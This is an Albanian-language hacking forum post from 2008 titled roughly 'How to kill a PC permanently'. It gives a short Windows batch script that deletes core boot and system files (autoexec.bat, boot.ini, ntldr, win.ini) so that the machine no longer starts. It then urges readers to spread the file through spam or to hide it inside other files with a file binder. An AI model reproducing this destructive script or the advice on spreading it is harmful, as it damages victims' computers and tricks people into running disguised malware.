Designer By:AseSsiNo
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Designer By:AseSsiNo

Derigjuar dhe Kontrolluar Nga FaT-MiR-IdRiZi
 
ForumLatest imagesKėrkoRegjistrohuidentifikimi

 

 Qysh me Fik Pc - Pergjithmon

Shko poshtė 
AutoriMesazh
PajtiM
cC|TeRroR
cC|TeRroR
PajtiM


Male Numri i postimeve : 54
Age : 32
Lokacioni : N`TeTov
Interesat e Juaja : Design, Programms , Hacking
Firma Juaj : Skom Firm
Registration date : 08/10/2007

Qysh me Fik Pc - Pergjithmon Empty
MesazhTitulli: Qysh me Fik Pc - Pergjithmon   Qysh me Fik Pc - Pergjithmon Icon_minitimeThu Feb 21, 2008 2:06 pm

TuTo By:cC|TeRrOR
Autor By:cN-Security

Fillimisht ,unė nuk mbajė pėrgjegjsi per dėmet qė mundė ti shkaktoni ju.
Hapim Notepadin dhe vendosim kėtė kodė:
---------------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
-----------------------------------------------------------
E ruajmė kėtė fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat
Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.
Kujdes! Mos e hapni kėtė fajll ne PC tuaj.
Tash ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder.
Mbrapsht nė krye Shko poshtė
http://WwW.AlbaBox.Info - AlbaSick.CoM - Ngjarjet.CoM - AlbaShar
 
Qysh me Fik Pc - Pergjithmon
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Designer By:AseSsiNo :: Hacking Programe-
Kėrce tek: